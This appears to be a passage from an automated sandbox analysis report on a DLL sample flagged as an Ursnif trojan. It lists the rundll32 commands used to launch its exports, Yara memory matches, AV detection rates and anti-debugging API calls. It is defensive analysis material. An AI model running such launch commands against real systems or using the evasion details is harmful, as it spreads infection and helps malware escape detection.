                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E1DE9F0 appears 37 times
                  Source: 3b17.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                  Source: classification engineClassification label: mal80.troj.winDLL@18/8@6/1
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E8513E CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_00E8513E
                  Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
                  Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF411F8F60C26A5FE3.TMPJump to behavior
                  Source: 3b17.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing
                  Source: 3b17.dllMetadefender: Detection: 22%
                  Source: 3b17.dllReversingLabs: Detection: 55%
                  Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\3b17.dll'
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seatforce
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Spaceclose
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Time
                  Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                  Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:17410 /prefetch:2
                  Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:82950 /prefetch:2
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,SeasonthingJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,SeatforceJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,SpacecloseJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,TimeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1Jump to behavior
                  Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:17410 /prefetch:2Jump to behavior
                  Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:82950 /prefetch:2Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                  Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                  Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                  Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
                  Source: 3b17.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: 3b17.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: 3b17.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: 3b17.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: 3b17.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: 3b17.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: 3b17.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                  Source: 3b17.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: c:\418\521\Condition\lake\Free_yet\Sky.pdb source: 3b17.dll
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E191F7C LoadLibraryA,GetProcAddress,0_2_6E191F7C
                  Source: 3b17.dllStatic PE information: real checksum: 0xa34b8 should be: 0x9effb
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E192200 push ecx; ret 0_2_6E192209
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E192253 push ecx; ret 0_2_6E192263
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E217583 push ecx; ret 0_2_6E217596
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E87A60 push ecx; ret 3_2_00E87A69
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E87DCF push ecx; ret 3_2_00E87DDF
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E217583 push ecx; ret 3_2_6E217596

                  Hooking and other Techniques for Hiding and Protection:

                  barindex
                  Yara detected UrsnifShow sources
                  Source: Yara matchFile source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY
                  Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1DE78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E1DE78D
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E191F7C LoadLibraryA,GetProcAddress,0_2_6E191F7C
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E20227F mov eax, dword ptr fs:[00000030h]0_2_6E20227F
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F2120 mov eax, dword ptr fs:[00000030h]0_2_6E1F2120
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E21E801 mov eax, dword ptr fs:[00000030h]0_2_6E21E801
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E21E730 mov eax, dword ptr fs:[00000030h]0_2_6E21E730
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E21E337 push dword ptr fs:[00000030h]0_2_6E21E337
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E20227F mov eax, dword ptr fs:[00000030h]3_2_6E20227F
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1F2120 mov eax, dword ptr fs:[00000030h]3_2_6E1F2120
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E21E801 mov eax, dword ptr fs:[00000030h]3_2_6E21E801
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E21E730 mov eax, dword ptr fs:[00000030h]3_2_6E21E730
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E21E337 push dword ptr fs:[00000030h]3_2_6E21E337
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1DE78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E1DE78D
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1DDFF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E1DDFF3
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F18EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E1F18EF
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1DE78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E1DE78D
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1DDFF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6E1DDFF3
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1F18EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E1F18EF
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1Jump to behavior
                  Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmpBinary or memory string: Progmanlock